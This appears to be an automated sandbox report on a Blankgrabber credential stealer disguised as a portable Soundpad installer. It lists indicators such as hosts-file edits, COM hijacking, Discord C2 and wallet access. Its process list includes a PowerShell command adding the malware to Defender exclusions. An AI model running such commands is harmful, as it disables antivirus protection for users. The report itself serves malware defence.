Analysis Overview
SHA256
a3ca472931818386738680dd8c6ce53e9bda2af06213f2ab27f3516eeebc03a7
Threat Level: Known bad
The file Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Event Triggered Execution: Component Object Model Hijacking
Loads dropped DLL
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Drops file in Program Files directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Gathers system information
Enumerates processes with tasklist
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Modifies registry class
Detects videocard installed
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 00:08
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 00:08
Reported
2024-06-21 00:10
Platform
win10v2004-20240611-en
Max time kernel
64s
Max time network
66s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI26682\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\system32\UniteFx1.8.0.dll | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Program Files\Common Files\Soundpad\SoundpadService.exe | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Soundpad\SoundpadService.exe | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71} | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\ = "URL:Soundpad Protocol" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MinOutputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MaxInstances = "4294967295" | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3169499791-3545231813-3156325206-1000\{FE0B0A1D-A10D-4231-B8EA-549B579EA409} | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithProgids\Soundpad.Soundlist | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MinInputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\ = "Soundpad sound list" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MinorVersion = "8" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MaxOutputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\ = "Soundpad.Soundlist" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open\command\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open\command | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\FriendlyName = "UniteFx" | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList\ehshell.exe | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\Copyright = "Copyright (C) 2016-2024 Leppsoft" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\PerceivedType = "audio" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MaxInputConnections = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList\ehshell.exe\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe,0" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\InprocServer32\ThreadingModel = "Both" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe\" -c \"%1\"" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\APOInterface0 = "{FD7F2B29-24D0-4B5C-B177-592C39F9CA10}" | C:\Windows\System32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open\command | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\shell\open\command\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad\URL Protocol | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\Flags = "14" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\NumAPOInterfaces = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\ = "UniteFx Class" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\InprocServer32\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\AudioEngine\AudioProcessingObjects\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\MajorVersion = "1" | C:\Windows\System32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad.Soundlist\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\\Soundpad.exe,1" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\Content Type = "audio/soundpadlist" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\.spl\OpenWithList\ehshell.exe\ | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Soundpad | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{27384E53-9860-0AC3-9519-C60EBCAA2C71}\InprocServer32\ = "C:\\Windows\\system32\\UniteFx1.8.0.dll" | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\Soundpad.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound_11b7b7ca-e16b-4f57-b88a-e11987fe5d8e\SoundpadService.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe
"C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe"
C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe
"C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Soundpad.v4.0.3.PORTABLE.by.TheCummer.exe'"
C:\Windows\system32\cmd.exe
